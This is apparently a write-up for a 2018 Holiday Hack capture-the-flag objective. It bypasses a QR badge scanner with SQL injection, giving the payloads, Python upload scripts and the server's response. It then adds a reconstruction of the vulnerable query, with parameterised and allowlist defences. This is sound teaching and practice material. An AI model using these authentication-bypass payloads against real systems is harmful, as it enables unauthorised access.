Objective 6: Badge Manipulation

Difficulty: 3/5

Note: This objective is found on the top floor, up the stairs from the floor one Eastern corridor.

Bypass the authentication mechanism associated with the room near Pepper Minstix. A sample employee badge is available (https://www.holidayhackchallenge.com/2018/challenges/alabaster_badge.jpg).
What is the access control number revealed by the door authentication panel?

For hints on achieving this objective, please visit Pepper Minstix and help her with the Yule Log Analysis Cranberry Pi terminal challenge.
Note: Pepper Minstix can be found on Floor 1 in the far East corridor.

Hints given:
https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF#Auth_Bypass
https://www.the-qrcode-generator.com/


The objective can be accessed directly via this link:
https://scanomatic.kringlecastle.com/index.html?challenge=qrcode&id=601b32cf-385e-4160-854c-03ee1efcf951


Fiddler can be used to intercept a request to the Scan-O-Matic server. The intercepted request (a multipart upload of the badge image) looks like the request below:

POST https://scanomatic.kringlecastle.com/upload HTTP/1.1
Host: scanomatic.kringlecastle.com
Connection: keep-alive
Content-Length: 214697
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://scanomatic.kringlecastle.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySeNIJHjjBbAK4FGg
Referer: https://scanomatic.kringlecastle.com/index.html?id=601b32cf-385e-4160-854c-03ee1efcf951
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: resource_id=601b32cf-385e-4160-854c-03ee1efcf951

------WebKitFormBoundarySeNIJHjjBbAK4FGg
Content-Disposition: form-data; name="barcode"; filename="alabaster_badge.png"
Content-Type: image/png

<DATA>
------WebKitFormBoundarySeNIJHjjBbAK4FGg--

The request can be replicated in Python using the code below (the qrcode library builds the PNG in memory, and requests sends it as the "barcode" form field with the same resource_id cookie):

import requests
import qrcode
import io

# Create QR code PNG image
data = "2"
memfile = io.BytesIO()
img = qrcode.make(data)
img.save(memfile, format="png")
imgbytes = memfile.getvalue()

# HTTPS request
file = {'barcode': ('ho-ho-no.png', imgbytes, 'image/png')}
cookie = {'resource_id': '601b32cf-385e-4160-854c-03ee1efcf951'}
response = requests.post('https://scanomatic.kringlecastle.com/upload', files=file, cookies=cookie)

# HTTPS response
print(response.text)

The Scan-O-Matic is vulnerable to SQL injection, and the Python script above needs only a small change to the QR payload to trick the system and get access. The single quote closes the string literal the badge id is placed in, OR enabled makes the WHERE clause true for any enabled account, and # starts a MySQL comment that discards the rest of the original query:

import requests
import qrcode
import io

# Create QR code PNG image containing the injection string instead of a badge id
sqli = "' OR enabled#"
memfile = io.BytesIO()
img = qrcode.make(sqli)
img.save(memfile, format="png")
imgbytes = memfile.getvalue()

# HTTPS request: same multipart upload and cookie as the intercepted request
file = {'barcode': ('ho-ho-no.png', imgbytes, 'image/png')}
cookie = {'resource_id': '601b32cf-385e-4160-854c-03ee1efcf951'}
response = requests.post('https://scanomatic.kringlecastle.com/upload', files=file, cookies=cookie)

# HTTPS response (JSON from the Scan-O-Matic)
print(response.text)

Running the script against the Scan-O-Matic:

root@kali:~# python scanomatic.py
{"data":"User Access Granted - Control number 19880715","request":true,"success":{"hash":"e89bca297348a069809ccd84e765afbbdb856c9f9866fde165b783e5796854ff","resourceId":"601b32cf-385e-4160-854c-03ee1efcf951"}}

The server returned control number:
19880715
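To make clear why the payload above works and what closes the hole, here is an added example that is not part of the original write-up or the Scan-O-Matic's own code. It reconstructs the vulnerable query shape as a hypothesis (the real schema is not on the page; only the column name "enabled" is implied by the working payload), uses an in-memory SQLite table with constructed rows, and shows two layers of defence: binding the decoded QR text as a query parameter, and allowlisting it as a plain numeric badge id before it reaches the database (the numeric format is an assumption based on the write-up's first script sending "2").

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the employee table; the rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE employees (uid TEXT PRIMARY KEY, name TEXT, enabled INTEGER)"
    )
    conn.executemany(
        "INSERT INTO employees VALUES (?, ?, ?)",
        [("1", "Sample Employee (badge disabled)", 0),
         ("2", "Sample Employee (badge enabled)", 1)],
    )
    return conn


def build_vulnerable_query(decoded_qr):
    """Hypothetical reconstruction of the query shape the page's payload exploits.

    The decoded QR text is spliced straight into the SQL string, so a single quote
    in the payload ends the uid literal early and everything after it is parsed as
    SQL. In MySQL, '#' starts a comment, which discards the rest of the original
    WHERE clause. This function only builds the string; it never executes it.
    """
    return f"SELECT name FROM employees WHERE uid = '{decoded_qr}' AND enabled = 1"


# Allowlist for a genuine badge id: a short run of digits (assumed format).
BADGE_ID_RE = re.compile(r"[0-9]{1,10}")


def lookup_badge_param(conn, decoded_qr):
    """Parameterised lookup: the decoded text is bound as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT name FROM employees WHERE uid = ? AND enabled = 1", (decoded_qr,)
    ).fetchone()
    return row[0] if row else None


def lookup_badge(conn, decoded_qr):
    """Defence in depth: reject anything that is not a plain badge id before it
    reaches the database, then run the parameterised query."""
    if not BADGE_ID_RE.fullmatch(decoded_qr):
        return None
    return lookup_badge_param(conn, decoded_qr)


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR enabled#"  # the injection string from this write-up
    print(build_vulnerable_query(payload))   # shows the WHERE clause being rewritten
    print(lookup_badge_param(conn, payload)) # None: the quote is just part of the uid value
    print(lookup_badge(conn, payload))       # None: rejected by the allowlist
    print(lookup_badge(conn, "2"))           # the enabled sample employee
```

The allowlist check is also the natural place to raise an alert: a decoded badge that contains quotes or SQL keywords is a strong signal that someone is probing the scanner, and logging the rejected value gives the blue team the same visibility the attacker had.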

Some more trivia: the SQL injection for this objective can be quite small. What is the smallest injection you can come up with?

Here is a working injection using only 11 characters: '||enabled# (in MySQL, || is the logical OR operator unless the PIPES_AS_CONCAT SQL mode is set, so it behaves exactly like the longer payload above).